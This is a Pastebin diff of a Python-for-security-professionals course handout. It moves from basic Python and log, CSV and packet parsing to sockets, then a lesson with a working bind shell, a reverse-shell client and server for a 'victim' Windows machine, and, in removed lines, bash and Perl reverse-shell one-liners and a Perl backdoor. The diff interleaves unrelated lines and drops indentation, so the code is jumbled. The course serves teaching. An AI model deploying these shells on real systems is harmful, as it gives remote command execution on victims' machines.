View difference between Paste ID: <a href="/XuXr11jp">XuXr11jp</a> and <a href="/Bbtm5hFR">Bbtm5hFR</a> - Pastebin.com

View difference between Paste ID: XuXr11jp and Bbtm5hFR

SHOW: | | - or go back to the newest paste.

1		Python Quizzes:
2	-	# Here is the courseware for this month #
2	+	---------------
3		https://www.tutorialspoint.com/python/python_online_quiz.htm
4		https://www.geeksforgeeks.org/python-gq/
5	-	Class powerpoint slides:
5	+	https://www.programiz.com/python-programming/quiz
6	-	http://45.63.104.73/PythonV3-1.pptx
6	+	https://www.afterhoursprogramming.com/tutorial/python/python-quiz/
7		https://www.sanfoundry.com/1000-python-questions-answers/
8		http://www.mypythonquiz.com/
9		http://www.techbeamers.com/python-programming-quiz-for-beginners-part-1/
10	-	Courseware Lab Manual
10	+
11	-	http://45.63.104.73//Python-For-InfoSec-Pros-2015.pdf
11	+
12
13
14	-	Class Videos:
14	+
15	-	https://s3.amazonaws.com/infosecaddictsvideos/2017-07-31+09.32+Python+for+InfoSec+Professionals.mp4
15	+
16	-	https://s3.amazonaws.com/infosecaddictsvideos/2017-08-01+09.40+Python+for+InfoSec+Professionals.mp4
16	+
17	-	https://s3.amazonaws.com/infosecaddictsvideos/2017-08-02+09.37+Python+for+InfoSec+Professionals.mp4
17	+
18	-	https://s3.amazonaws.com/infosecaddictsvideos/2017-08-03+10.29+Python+for+InfoSec+Professionals.mp4
18	+
19		http://www.python.org/ftp/python/2.7.5/python-2.7.5.msi
20
21	-	Resource files:
21	+
22	-	http://45.63.104.73/Python4SecurityPros-Files.zip
22	+
23
24	-	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
24	+
25	-	user: infosecaddicts
25	+
26	-	pass: infosecaddicts
26	+
27		---------------------------Type This-----------------------------------
28
29		Linux
30		Debian/Ubuntu: sudo apt-get install -y python
31	-	The youtube video playlist that I'd like for you to watch is located here:
31	+
32	-	https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
32	+
33		-----------------------------------------------------------------------
34
35	-	How I did it:
35	+
36		After you install Python in Linux the next thing that you will need to do is install idle.
37	-	Step 1: Watch and do the newboston Python video series twice
37	+
38	-	https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
38	+
39
40		sudo apt-get install -y idle
41	-	Step 2: Watch and do the Google Python workshop twice
41	+
42	-	https://www.youtube.com/playlist?list=PLfZeRfzhgQzTMgwFVezQbnpc1ck0I6CQl
42	+
43
44		Open IDLE, and let's just dive right in.
45	-	Step 3: Download all of the Python tools from PacketStorm and analyze the source code
45	+
46	-	https://packetstormsecurity.com/files/tags/python
46	+
47
48
49	-	Here is the code from Packet Storm
49	+
50	-	http://45.63.104.73/PythonReferenceCode.zip
50	+	# Python Lesson 1: Simple Printing #
51		######################################
52	-	I went through almost every single file and looked up the code that I didn't understand.
52	+
53	-	I also asked programmers to help me understand the lines of code that didn't make sense.
53	+
54	-	In the folder RAC-Brute I actually had to hire a developer from an outsourcing website to comment,
54	+
55	-	and explain the tool to me.
55	+
56		>>> print "Today we are learning Python."
57	-	Here is what I got out of doing that:
57	+
58	-	https://s3.amazonaws.com/infosecaddictsfiles/sorted-commented-python-files.zip
58	+
59
60
61
62	-	Distilled that into this:
62	+
63	-	http://45.63.104.73/Python-Courseware.zip
63	+
64		# Python Lesson 2: Simple Numbers and Math #
65		##############################################
66
67	-	##############################
67	+
68	-	----------- ############### # Day 1: Python Fundamentals # ############### -----------
68	+
69	-	##############################
69	+
70
71		>>> 6-3
72
73		>>> 18/7
74
75		>>> 18.0/7
76
77		>>> 18.0/7.0
78
79		>>> 18/7
80
81		>>> 9%4
82
83		>>> 8%4
84
85		>>> 8.75%.5
86
87		>>> 6.*7
88
89		>>> 666
90
91		>>> 6**3
92
93		>>> 5**12
94
95		>>> -5**4
96
97
98		-----------------------------------------------------------------------
99
100
101
102		################################
103		# Python Lesson 3: Variables #
104		################################
105
106		---------------------------Type This-----------------------------------
107
108	-	#Python Lesson 1: Simple Printing #
108	+
109
110		>>> x+15
111
112		>>> x**3
113
114		>>> y=54
115
116		>>> x+y
117
118		>>> g=input("Enter number here: ")
119		43
120
121		>>> g+32
122	-	#Python Lesson 2: Simple Numbers and Math #
122	+
123		>>> g**3
124
125
126		-----------------------------------------------------------------------
127
128
129
130
131
132		##########################################
133		# Python Lesson 4: Modules and Functions #
134		##########################################
135
136		---------------------------Type This-----------------------------------
137
138		>>> 5**4
139
140		>>> pow(5,4)
141
142		>>> abs(-18)
143
144		>>> abs(5)
145
146		>>> floor(18.7)
147
148		>>> import math
149
150		>>> math.floor(18.7)
151
152		>>> math.sqrt(81)
153
154		>>> joe = math.sqrt
155
156		>>> joe(9)
157
158		>>> joe=math.floor
159
160		>>> joe(19.8)
161	-	#Python Lesson 3: Variables #
161	+
162
163
164		-----------------------------------------------------------------------
165
166
167
168		############################
169		# Python Lesson 5: Strings #
170		############################
171
172		---------------------------Type This-----------------------------------
173
174
175		>>> "XSS"
176
177		>>> 'SQLi'
178
179		>>> "Joe's a python lover"
180
181		>>> 'Joe\'s a python lover'
182
183		>>> "Joe said \"InfoSec is fun\" to me"
184
185		>>> a = "Joe"
186
187		>>> b = "McCray"
188
189		>>> a, b
190	-	###########################################
190	+
191	-	#Python Lesson 4: Modules and Functions #
191	+
192	-	###########################################
192	+
193
194		-----------------------------------------------------------------------
195
196
197
198
199
200		#################################
201		# Python Lesson 6: More Strings #
202		#################################
203
204		---------------------------Type This-----------------------------------
205
206
207		>>> num = 10
208
209		>>> num + 2
210
211		>>> "The number of open ports found on this system is " + num
212
213		>>> num = str(18)
214
215		>>> "There are " + num + " vulnerabilities found in this environment."
216
217		>>> num2 = 46
218
219		>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
220
221
222		-----------------------------------------------------------------------
223
224
225
226
227	-	#Python Lesson 5: Strings #
227	+
228		########################################
229		# Python Lesson 7: Sequences and Lists #
230		########################################
231
232		---------------------------Type This-----------------------------------
233
234		>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
235
236		>>> attacks
237		['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
238
239		>>> attacks[3]
240		'SQL Injection'
241
242		>>> attacks[-2]
243		'Cross-Site Scripting'
244
245		>>> exit()
246
247		-----------------------------------------------------------------------
248
249
250
251
252		##################################
253		# Level 8: Intro to Log Analysis #
254		##################################
255
256
257		Log into your Linux host then execute the following commands:
258		-----------------------------------------------------------------------
259	-	#Python Lesson 6: More Strings #
259	+
260
261
262
263		---------------------------Type This-----------------------------------
264
265		wget http://pastebin.com/raw/85zZ5TZX
266
267		mv 85zZ5TZX access_log
268
269
270		cat access_log \| grep 141.101.80.188
271
272		cat access_log \| grep 141.101.80.187
273
274		cat access_log \| grep 108.162.216.204
275
276		cat access_log \| grep 173.245.53.160
277
278		----------------------------------------------------------------------
279
280
281
282
283
284		Google the following terms:
285		- Python read file
286		- Python read line
287	-	#Python Lesson 7: Sequences and Lists #
287	+
288
289
290
291
292		###############################################################
293		# Python Lesson 9: Use Python to read in a file line by line #
294		###############################################################
295
296
297		Reference:
298		http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
299
300
301
302		---------------------------Type This-----------------------------------
303
304		nano logread1.py
305
306
307		---------------------------Paste This-----------------------------------
308		## Open the file with read only permit
309		f = open('access_log', "r")
310	-	###################################
310	+
311		## use readlines to read all lines in the file
312	-	###################################
312	+
313		lines = f.readlines()
314
315		print lines
316
317
318		## close the file after reading the lines.
319		f.close()
320
321		----------------------------------------------------------------------
322
323
324
325
326		---------------------------Type This-----------------------------------
327		python logread1.py
328		----------------------------------------------------------------------
329
330
331
332		Google the following:
333		- python difference between readlines and readline
334		- python readlines and readline
335
336
337
338
339
340
341
342
343		########################################
344		#Python Lesson 10: A quick challenge #
345		########################################
346
347		Can you write an if/then statement that looks for this IP and print the log file line that contains the IP address?
348
349
350	-	################################################################
350	+
351	-	#Python Lesson 9: Use Python to read in a file line by line #
351	+
352	-	################################################################
352	+
353
354
355
356
357		---------------------------------------------------------
358		Hint 1: Use Python to look for a value in a list
359
360		Reference:
361		http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
362
363
364
365
366		---------------------------------------------------------
367		Hint 2: Use Python to prompt for user input
368
369		Reference:
370		http://www.cyberciti.biz/faq/python-raw_input-examples/
371
372
373
374
375		---------------------------------------------------------
376		Hint 3: Use Python to search for a string in a list
377
378		Reference:
379		http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
380
381
382
383
384
385		Here is my solution:
386
387		---------------------------Type This-----------------------------------
388
389		$ python
390		>>> f = open('access_log', "r")
391		>>> lines = f.readlines()
392		>>> ip = '141.101.81.187'
393		>>> for string in lines:
394		... if ip in string:
395		... print(string)
396
397		----------------------------------------------------------------------
398
399
400		Here is one student's solution - can you please explain each line of this code to me?
401
402
403		---------------------------Type This-----------------------------------
404		exit()
405		nano ip_search.py
406
407		---------------------------Paste This-----------------------------------
408		#!/usr/bin/python
409
410		f = open('access_log')
411
412		strUsrinput = raw_input("Enter IP Address: ")
413
414		for line in iter(f):
415		ip = line.split(" - ")[0]
416		if ip == strUsrinput:
417		print line
418
419		f.close()
420
421		----------------------------------------------------------------------
422
423
424
425
426		---------------------------Type This-----------------------------------
427		python ip_search.py
428		----------------------------------------------------------------------
429
430
431
432
433
434
435
436
437		Working with another student after class we came up with another solution:
438
439		---------------------------Type This-----------------------------------
440		nano ip_search2.py
441
442		---------------------------Paste This-----------------------------------
443		#!/usr/bin/env python
444
445
446		# This line opens the log file
447		f=open('access_log',"r")
448
449		# This line takes each line in the log file and stores it as an element in the list
450		lines = f.readlines()
451
452
453		# This lines stores the IP that the user types as a var called userinput
454		userinput = raw_input("Enter the IP you want to search for: ")
455
456
457
458		# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
459		for ip in lines:
460		if ip.find(userinput) != -1:
461		print ip
462
463		----------------------------------------------------------------------
464
465
466
467		---------------------------Type This-----------------------------------
468		python ip_search2.py
469		----------------------------------------------------------------------
470
471
472		#################################################
473		# Lesson 14: Look for web attacks in a log file #
474		#################################################
475
476		In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
477		Supported attacks:
478		1. SQL Injection
479		2. Local File Inclusion
480		3. Remote File Inclusion
481		4. Cross-Site Scripting
482
483
484		---------------------------Type This-----------------------------------
485
486		wget https://s3.amazonaws.com/infosecaddictsfiles/scan_log.py
487
488		----------------------------------------------------------------------
489
490		The usage for scan_log.py is simple. You feed it an apache log file.
491
492		---------------------------Type This-----------------------------------
493
494		cat scan_log.py \| less (use your up/down arrow keys to look through the file)
495
496		----------------------------------------------------------------------
497
498		Explain to me how this script works.
499
500
501
502		################################
503		# Lesson 15: Parsing CSV Files #
504		################################
505
506		Dealing with csv files
507
508		Reference:
509		http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/
510
511		Type the following commands:
512		---------------------------------------------------------------------------------------------------------
513
514		---------------------------Type This-----------------------------------
515
516		wget https://s3.amazonaws.com/infosecaddictsfiles/class_nessus.csv
517
518		----------------------------------------------------------------------
519
520		Example 1 - Reading CSV files
521		-----------------------------
522		#To be able to read csv formated files, we will first have to import the
523		#csv module.
524
525
526		---------------------------Type This-----------------------------------
527		python
528		import csv
529		with open('class_nessus.csv', 'rb') as f:
530	-	##################################################
530	+
531	-	# Lession 14: Look for web attacks in a log file #
531	+
532	-	##################################################
532	+
533
534
535		----------------------------------------------------------------------
536
537
538
539
540		Example 2 - Reading CSV files
541		-----------------------------
542
543		---------------------------Type This-----------------------------------
544	-	wget http://45.63.104.73/scan_log.py
544	+
545		vi readcsv.py
546
547		---------------------------Paste This-----------------------------------
548		#!/usr/bin/python
549		import csv # imports the csv module
550		import sys # imports the sys module
551
552		f = open(sys.argv[1], 'rb') # opens the csv file
553		try:
554		reader = csv.reader(f) # creates the reader object
555		for row in reader: # iterates the rows of the file in orders
556		print row # prints each row
557		finally:
558		f.close() # closing
559
560
561
562		----------------------------------------------------------------------
563
564
565
566		Ok, now let's run this thing.
567
568		--------------------------Type This-----------------------------------
569		python readcsv.py
570
571		python readcsv.py class_nessus.csv
572		----------------------------------------------------------------------
573
574	-	wget http://45.63.104.73/class_nessus.csv
574	+
575
576
577
578		Example 3 - - Reading CSV files
579		-------------------------------
580
581		---------------------------Type This-----------------------------------
582
583		vi readcsv2.py
584
585		---------------------------Paste This-----------------------------------
586		#!/usr/bin/python
587		# This program will then read it and displays its contents.
588
589
590		import csv
591
592		ifile = open('class_nessus.csv', "rb")
593		reader = csv.reader(ifile)
594
595		rownum = 0
596		for row in reader:
597		# Save header row.
598		if rownum == 0:
599		header = row
600		else:
601		colnum = 0
602		for col in row:
603		print '%-8s: %s' % (header[colnum], col)
604		colnum += 1
605
606		rownum += 1
607
608		ifile.close()
609
610
611		----------------------------------------------------------------------
612
613
614
615		---------------------------Type This-----------------------------------
616
617		python readcsv2.py \| less
618
619
620		----------------------------------------------------------------------
621
622
623
624
625
626		/---------------------------------------------------/
627		--------------------PARSING CSV FILES----------------
628		/---------------------------------------------------/
629
630		-------------TASK 1------------
631
632		---------------------------Type This-----------------------------------
633
634		vi readcsv3.py
635
636		---------------------------Paste This-----------------------------------
637		#!/usr/bin/python
638		import csv
639		f = open('class_nessus.csv', 'rb')
640		try:
641		rownum = 0
642		reader = csv.reader(f)
643		for row in reader:
644		#Save header row.
645		if rownum == 0:
646		header = row
647		else:
648		colnum = 0
649		if row[3].lower() == 'high':
650		print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
651		rownum += 1
652		finally:
653		f.close()
654
655		-----------------------------------------------------------------------
656
657
658		---------------------------Type This-----------------------------------
659
660		python readcsv3.py \| less
661		-----------------------------------------------------------------------
662
663		-------------TASK 2------------
664
665		---------------------------Type This-----------------------------------
666
667		vi readcsv4.py
668		-----------------------------------------------------------------------
669
670		---------------------------Paste This-----------------------------------
671
672		#!/usr/bin/python
673		import csv
674		f = open('class_nessus.csv', 'rb')
675		try:
676		print '/---------------------------------------------------/'
677		rownum = 0
678		hosts = {}
679		reader = csv.reader(f)
680		for row in reader:
681		# Save header row.
682		if rownum == 0:
683		header = row
684		else:
685		colnum = 0
686		if row[3].lower() == 'high' and row[4] not in hosts:
687		hosts[row[4]] = row[4]
688		print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
689		rownum += 1
690		finally:
691		f.close()
692
693
694		python readcsv4.py \| less
695
696		----------------------------------------------------------------------
697
698
699
700
701
702
703
704
705		#################################################
706		# Lesson 16: Parsing Packets with Python's DPKT #
707		#################################################
708		The first thing that you will need to do is install dpkt.
709
710		---------------------------Type This-----------------------------------
711
712
713		sudo apt-get install -y python-dpkt
714
715		----------------------------------------------------------------------
716
717
718
719		Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'.
720		Run tcpdump to capture a .pcap file that we will use for the next exercise
721
722		---------------------------Type This-----------------------------------
723
724		sudo tcpdump -ni eth0 -s0 -w quick.pcap
725
726		----------------------------------------------------------------------
727
728		--open another command prompt--
729
730		---------------------------Type This-----------------------------------
731
732
733		wget http://packetlife.net/media/library/12/tcpdump.pdf
734
735		----------------------------------------------------------------------
736
737		Let's do something simple:
738
739		---------------------------Type This-----------------------------------
740
741
742		vi quickpcap.py
743
744		---------------------------Paste This-----------------------------------
745
746		#!/usr/bin/python
747		import dpkt;
748
749		# Simple script to read the timestamps in a pcap file
750		# Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html
751
752		f = open("quick.pcap","rb")
753		pcap = dpkt.pcap.Reader(f)
754
755		for ts, buf in pcap:
756		print ts;
757
758		f.close();
759
760
761		----------------------------------------------------------------------
762
763
764		Now let's run the script we just wrote
765
766		---------------------------Type This-----------------------------------
767
768		python quickpcap.py
769
770		----------------------------------------------------------------------
771
772
773
774		How dpkt breaks down a packet:
775
776		Reference:
777		http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html
778	-	sudo tcpdump -ni ens3 -s0 -w quick.pcap
778	+
779		src: the MAC address of SOURCE.
780		dst: The MAC address of DESTINATION
781		type: The protocol type of contained ethernet payload.
782
783		The allowed values are listed in the file "ethernet.py",
784		such as:
785		a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
786		b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
787
788
789		References:
790		http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python
791
792
793
794
795
796
797		Ok - now let's have a look at pcapparsing.py
798
799		---------------------------Type This-----------------------------------
800
801
802		sudo tcpdump -ni eth0 -s0 -w capture-100.pcap
803
804		----------------------------------------------------------------------
805
806		--open another command prompt--
807
808		---------------------------Type This-----------------------------------
809
810
811		wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
812
813		----------------------------------------------------------------------
814
815
816		Ok - now let's have a look at pcapparsing.py
817
818
819		--------------------------------------------------------------
820
821
822		import socket
823		import dpkt
824		import sys
825		f = open('capture-100.pcap','r')
826		pcapReader = dpkt.pcap.Reader(f)
827
828		for ts,data in pcapReader:
829		ether = dpkt.ethernet.Ethernet(data)
830		if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
831		ip = ether.data
832		tcp = ip.data
833		src = socket.inet_ntoa(ip.src)
834		srcport = tcp.sport
835		dst = socket.inet_ntoa(ip.dst)
836		dstport = tcp.dport
837		print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)
838
839		f.close()
840
841		----------------------------------------------------------------------
842
843
844
845		OK - let's run it:
846
847		---------------------------Type This-----------------------------------
848
849		python pcapparsing.py
850
851		----------------------------------------------------------------------
852
853
854		running this script might throw an error like this:
855
856	-	sudo tcpdump -ni ens3 -s0 -w capture-100.pcap
856	+
857		File "pcapparsing.py", line 9, in <module>
858		if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
859
860
861		If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
862
863
864
865
866		Your homework for today...
867
868
869		Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
870
871
872
873
874
875
876		Your challenge is to fix the Traceback error
877
878		---------------------------Paste This-----------------------------------
879
880		#!/usr/bin/python
881
882		import pcapy
883		import dpkt
884		import sys
885		import socket
886		import struct
887
888		SINGLE_SHOT = False
889
890		# list all the network devices
891		pcapy.findalldevs()
892
893		iface = "eth0"
894		filter = "arp"
895		max_bytes = 1024
896		promiscuous = False
897		read_timeout = 100 # in milliseconds
898
899		pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
900		pc.setfilter( filter )
901
902		# callback for received packets
903		def recv_pkts( hdr, data ):
904		packet = dpkt.ethernet.Ethernet( data )
905
906		print type( packet.data )
907		print "ipsrc: %s, ipdst: %s" %( \
908		socket.inet_ntoa( packet.data.spa ), \
909		socket.inet_ntoa( packet.data.tpa ) )
910
911		print "macsrc: %s, macdst: %s " % (
912		"%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
913		"%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )
914
915		if SINGLE_SHOT:
916		header, data = pc.next()
917		sys.exit(0)
918		else:
919		packet_limit = -1 # infinite
920		pc.loop( packet_limit, recv_pkts ) # capture packets
921
922		----------------------------------------------------------------------
923
924		Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
925
926		Running the current version of the script may give you an error like this:
927
928		Traceback (most recent call last):
929		File "pcapparsing.py", line 9, in <module>
930		if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
931
932
933		If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
934
935		Your challenge task is to fix the Traceback error
936
937		#############################################
938		# Lesson 17: Python Sockets & Port Scanning #
939		#############################################
940
941		---------------------------Type This-----------------------------------
942
943		$ sudo /sbin/iptables -F
944
945		$ ncat -l -v -p 1234
946
947	-	iface = "ens3"
947	+
948
949
950
951		--open another terminal--
952
953		---------------------------Type This-----------------------------------
954
955		python
956
957		>>> import socket
958		>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
959		>>> s.connect(('localhost', 1234))
960		>>> s.send('Hello, world')
961		>>> data = s.recv(1024)
962		>>> s.close()
963
964		>>> print 'Received', data
965
966
967		----------------------------------------------------------------------
968
969
970
971
972		########################################
973		# Lesson 18: TCP Client and TCP Server #
974		########################################
975
976		---------------------------Type This-----------------------------------
977
978
979		vi tcpclient.py
980	-	# Day 1 Homework videos to watch #
980	+
981		---------------------------Paste This-----------------------------------
982	-	Here is your first set of youtube videos that I'd like for you to watch:
982	+
983	-	https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
983	+
984		#!/usr/bin/python
985	-	How to install idle in Mac OS X:
985	+
986	-	https://stackoverflow.com/questions/8792044/how-do-i-launch-idle-the-development-environment-for-python-on-mac-os-10-7
986	+
987		import socket
988
989		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
990		hostport = ("127.0.0.1", 1337)
991		s.connect(hostport)
992	-	# Day 1 Challenge task #
992	+
993		buf = s.recv(1024)
994		print "Received", buf
995
996
997
998		----------------------------------------------------------------------
999
1000
1001		---------------------------Type This-----------------------------------
1002
1003
1004
1005
1006		vi tcpserver.py
1007
1008
1009		---------------------------Paste This-----------------------------------
1010
1011
1012		#!/usr/bin/python
1013		# tcpserver.py
1014
1015		import socket
1016
1017		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1018		hostport = ("", 1337)
1019		s.bind(hostport)
1020		s.listen(10)
1021		while 1:
1022		cli,addr = s.accept()
1023		print "Connection from", addr
1024		buf = cli.recv(1024)
1025	-	#################################
1025	+
1026	-	----------- ############### # Day 2: Python sockets & Scapy # ############### -----------
1026	+
1027	-	#################################
1027	+
1028		cli.close()
1029
1030
1031
1032
1033		----------------------------------------------------------------------
1034
1035
1036		---------------------------Type This-----------------------------------
1037
1038
1039		python tcpserver.py
1040
1041
1042		--open another terminal--
1043		python tcpclient.py
1044
1045		----------------------------------------------------------------------
1046
1047		########################################
1048		# Lesson 19: UDP Client and UDP Server #
1049		########################################
1050
1051		---------------------------Type This-----------------------------------
1052
1053		vi udpclient.py
1054
1055
1056
1057		---------------------------Paste This-----------------------------------
1058
1059
1060
1061		#!/usr/bin/python
1062		# udpclient.py
1063
1064		import socket
1065
1066		s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
1067		hostport = ("127.0.0.1", 1337)
1068		s.sendto("Hello\n", hostport)
1069		buf = s.recv(1024)
1070		print buf
1071
1072
1073
1074		----------------------------------------------------------------------
1075
1076
1077
1078
1079		---------------------------Type This-----------------------------------
1080
1081
1082		vi udpserver.py
1083
1084
1085		---------------------------Paste This-----------------------------------
1086
1087
1088
1089
1090		#!/usr/bin/python
1091		# udpserver.py
1092
1093		import socket
1094
1095		s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
1096		hostport = ("127.0.0.1", 1337)
1097		s.bind(hostport)
1098		while 1:
1099		buf, address = s.recvfrom(1024)
1100		print buf
1101		if buf == "Hello\n":
1102		s.sendto("Server ID 1\n", address)
1103
1104
1105		----------------------------------------------------------------------
1106
1107
1108		---------------------------Type This-----------------------------------
1109
1110
1111		python udpserver.py
1112
1113
1114		--open another terminal--
1115		python udpclient.py
1116
1117		----------------------------------------------------------------------
1118
1119
1120		######################################
1121		# Lesson 20: Bind and Reverse Shells #
1122		######################################
1123
1124		---------------------------Type This-----------------------------------
1125
1126
1127		vi simplebindshell.py
1128
1129		---------------------------Paste This-----------------------------------
1130
1131		#!/bin/python
1132		import os,sys,socket
1133
1134		ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
1135		print '-Creating socket..'
1136		port = 31337
1137		try:
1138		ls.bind(('', port))
1139		print '-Binding the port on '
1140		ls.listen(1)
1141		print '-Listening, '
1142		(conn, addr) = ls.accept()
1143		print '-Waiting for connection...'
1144		cli= conn.fileno()
1145		print '-Redirecting shell...'
1146		os.dup2(cli, 0)
1147		print 'In, '
1148		os.dup2(cli, 1)
1149		print 'Out, '
1150		os.dup2(cli, 2)
1151		print 'Err'
1152		print 'Done!'
1153		arg0='/bin/sh'
1154		arg1='-a'
1155		args=[arg0]+[arg1]
1156		os.execv(arg0, args)
1157		except(socket.error):
1158		print 'fail\n'
1159		conn.close()
1160		sys.exit(1)
1161
1162		----------------------------------------------------------------------
1163
1164
1165
1166		---------------------------Type This-----------------------------------
1167
1168		nc TARGETIP 31337
1169
1170		----------------------------------------------------------------------
1171
1172
1173		---------------------
1174		Preparing the target for a reverse shell
1175
1176		---------------------------Type This-----------------------------------
1177
1178		$ ncat -lvp 4444
1179
1180		--open another terminal--
1181		wget https://www.trustedsec.com/files/simple_py_shell.py
1182
1183		vi simple_py_shell.py
1184
1185
1186
1187		----------------------------------------------------------------------
1188
1189
1190
1191		-------------------------------
1192		Tricky shells
1193
1194		Reference:
1195		http://securityweekly.com/2011/10/python-one-line-shell-code.html
1196		http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
1197
1198
1199
1200
1201		###############################
1202		# Reverse Shell in Python 2.7 #
1203		###############################
1204
1205		We'll create 2 python files. One for the server and one for the client.
1206
1207		- Below is the python code that is running on victim/client Windows machine:
1208
1209		---------------------------Paste This-----------------------------------
1210
1211		# Client
1212
1213		import socket # For Building TCP Connection
1214		import subprocess # To start the shell in the system
1215
1216		def connect():
1217		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1218		s.connect(('192.168.243.150',8080))
1219
1220		while True: #keep receiving commands
1221		command = s.recv(1024)
1222
1223		if 'terminate' in command:
1224		s.close() #close the socket
1225		break
1226
1227		else:
1228
1229		CMD = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
1230		s.send( CMD.stdout.read() ) # send the result
1231		s.send( CMD.stderr.read() ) # incase you mistyped a command.
1232		# we will send back the error
1233
1234		def main ():
1235		connect()
1236		main()
1237
1238
1239		----------------------------------------------------------------------
1240
1241		- Below is the code that we should run on server unit, in our case InfosecAddicts Ubuntu machine ( Ubuntu IP: 192.168.243.150 )
1242
1243		---------------------------Paste This-----------------------------------
1244
1245		# Server
1246
1247		import socket # For Building TCP Connection
1248
1249
1250		def connect ():
1251
1252		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1253		s.bind(("192.168.243.150", 8080))
1254		s.listen(1)
1255		conn, addr = s.accept()
1256		print '[+] We got a connection from: ', addr
1257
1258
1259		while True:
1260		command = raw_input("Shell> ")
1261
1262		if 'terminate' in command:
1263		conn.send('termminate')
1264		conn.close() # close the connection with host
1265		break
1266
1267		else:
1268		conn.send(command) #send command
1269		print conn.recv(1024)
1270
1271		def main ():
1272		connect()
1273		main()
1274
1275		----------------------------------------------------------------------
1276
1277		- First run server.py code from Ubuntu machine. From command line type:
1278
1279		---------------------------Type This-----------------------------------
1280
1281		python server.py
1282
1283		----------------------------------------------------------------------
1284
1285		- then check if 8080 port is open, and if we are listening on 8080:
1286
1287		---------------------------Type This-----------------------------------
1288
1289		netstat -antp \| grep "8080"
1290
1291		----------------------------------------------------------------------
1292
1293		- Then on victim ( Windows ) unit run client.py code.
1294
1295
1296	-	What is os.dup2?
1296	+
1297	-	https://stackoverflow.com/questions/45517168/what-does-os-dup2-do-in-a-python-reverse-shell-when-used-with-the-socket
1297	+
1298		---------------------------Type This-----------------------------------
1299
1300		infosecaddicts@ubuntu:~$ python server.py
1301		[+] We got a connection from: ('192.168.243.1', 56880)
1302		Shell> arp -a
1303	-	Lots of reverse shells in different languages
1303	+
1304	-	---------------------------------------------------------------------
1304	+
1305
1306		Shell> dir
1307		----------------------------------------------------------------------
1308	-	########
1308	+
1309	-	# Bash #
1309	+
1310	-	########
1310	+
1311		# HTTP based reverse shell in Python 2.7 #
1312		##########################################
1313
1314
1315	-	bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
1315	+
1316		- Download get-pip.py from https://bootstrap.pypa.io/get-pip.py on your Windows machine
1317
1318		Then run python get-pip.py from command line. Once pip is installed you may use it to install packages.
1319
1320	-	########
1320	+
1321	-	# Perl #
1321	+
1322	-	########
1322	+
1323		python -m pip install requests
1324
1325		----------------------------------------------------------------------
1326
1327	-	perl -e 'use Socket;$i="127.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
1327	+
1328
1329		- In my case server/ubuntu IP is 192.168.243.150. You need to change IP to your server address, in both codes (client_http.py, server_HTTP.py)
1330
1331	-	cat perlbackdoor.pl
1331	+
1332	-	#!/usr/bin/perl
1332	+
1333	-	use Socket;
1333	+
1334	-	use FileHandle;
1334	+
1335	-	$IP = $ARGV[0];
1335	+
1336	-	$PORT = $ARGV[1];
1336	+
1337	-	socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
1337	+
1338	-	connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
1338	+
1339	-	SOCKET->autoflush();
1339	+
1340	-	open(STDIN, ">&SOCKET");
1340	+
1341	-	open(STDOUT,">&SOCKET");
1341	+
